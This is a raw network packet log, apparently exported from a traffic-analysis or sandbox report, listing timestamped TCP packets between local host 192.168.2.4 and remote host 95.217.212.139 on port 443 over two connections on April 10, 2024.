                                                                                                                                                                                                          Apr 10, 2024 08:56:39.355983973 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.356004000 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.358968019 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.359010935 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.359055042 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.359072924 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.359098911 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.359122038 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.361999035 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.362040043 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.362086058 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.362102032 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.362127066 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.362149954 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.365793943 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.365835905 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.365880013 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.365896940 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.365925074 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.365947962 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.368787050 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.368828058 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.368869066 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.368880033 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.368962049 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.368984938 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.371752977 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.371793032 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.371833086 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.371844053 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.371871948 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.371897936 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.374520063 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.374586105 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.374614954 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.374625921 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.374654055 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.374675035 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.378339052 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.378393888 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.378426075 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.378437996 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.378464937 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.378493071 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.381408930 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.381452084 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.381505013 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.381572962 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.381611109 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.381637096 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.384299994 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.384341955 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.384385109 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.384398937 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.384428978 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.384455919 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.386996031 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.387034893 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.387080908 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.387093067 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.387123108 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.387144089 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.389811993 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.389853001 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.389897108 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.389914989 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.389945030 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.389966965 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.393215895 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.393258095 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.393300056 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.393311977 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.393340111 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.393366098 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.395925999 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.395967007 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.396012068 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.396023035 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.396053076 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.396070957 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398510933 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398550987 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398596048 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398608923 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398638010 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398660898 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401232004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401273966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401318073 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401328087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401359081 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401379108 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404448986 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404489040 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404531002 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404541969 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404571056 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404591084 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407016993 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407057047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407104015 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407114983 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407152891 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407170057 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409641981 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409717083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409729958 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409812927 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409853935 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409877062 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412134886 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412174940 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412215948 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412245989 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412306070 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412306070 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415316105 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415355921 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415518999 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415518999 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415584087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415693045 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417773962 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417817116 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417860985 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417876005 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417905092 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417932987 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420247078 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420341969 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420382023 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420396090 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420424938 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420449972 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423443079 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423486948 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423578024 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423578024 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423644066 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423705101 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425658941 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425699949 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425760031 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425829887 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425873041 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425898075 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428107023 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428145885 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428195953 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428210020 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428272009 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428272009 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430471897 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430510998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430555105 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430567980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430599928 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430641890 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433213949 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433254004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433304071 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433372021 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433413029 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433437109 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435832024 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435873032 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435914993 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435929060 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435960054 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.436027050 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437829971 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437869072 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437910080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437923908 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437957048 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.437977076 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440665007 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440705061 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440751076 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440763950 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440792084 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.440815926 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443434000 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443471909 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443622112 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443685055 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.443758965 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.445462942 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.445504904 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.445662975 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.445662975 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.445728064 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.445796967 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.447411060 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.447465897 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.447606087 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.447607040 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.447671890 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.447732925 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.450102091 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.450143099 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.450190067 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.450205088 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.450237036 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.450264931 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.452893019 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.452933073 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.452980042 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.452991962 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.453021049 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.453051090 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.454776049 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.454816103 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.454864979 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.454876900 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.454906940 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.454929113 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.458105087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.458154917 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.458193064 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.458204031 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.458231926 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.458256006 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.460506916 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.460547924 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.460596085 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.460611105 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.460640907 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.460669994 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.462738037 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.462779045 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.462825060 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.462836027 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.462866068 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.462892056 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.465008974 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.465048075 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.465101004 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.465114117 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.465142012 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.465159893 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.466840029 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.466897964 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.466924906 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.466936111 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.466963053 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.467003107 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.467035055 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.467099905 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.467495918 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.467525005 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.648426056 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.648468971 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.648555040 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.648819923 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.648837090 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.051954985 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.055253029 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.055727005 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.055752993 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.055898905 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.055912018 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689038038 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689100981 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689129114 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689146996 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689174891 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689177036 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689198971 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689214945 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689229965 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.689246893 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.778986931 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.779016018 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.779077053 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.779097080 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.779114008 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.779129982 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.907037973 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.907108068 CEST4434976295.217.212.139192.168.2.4
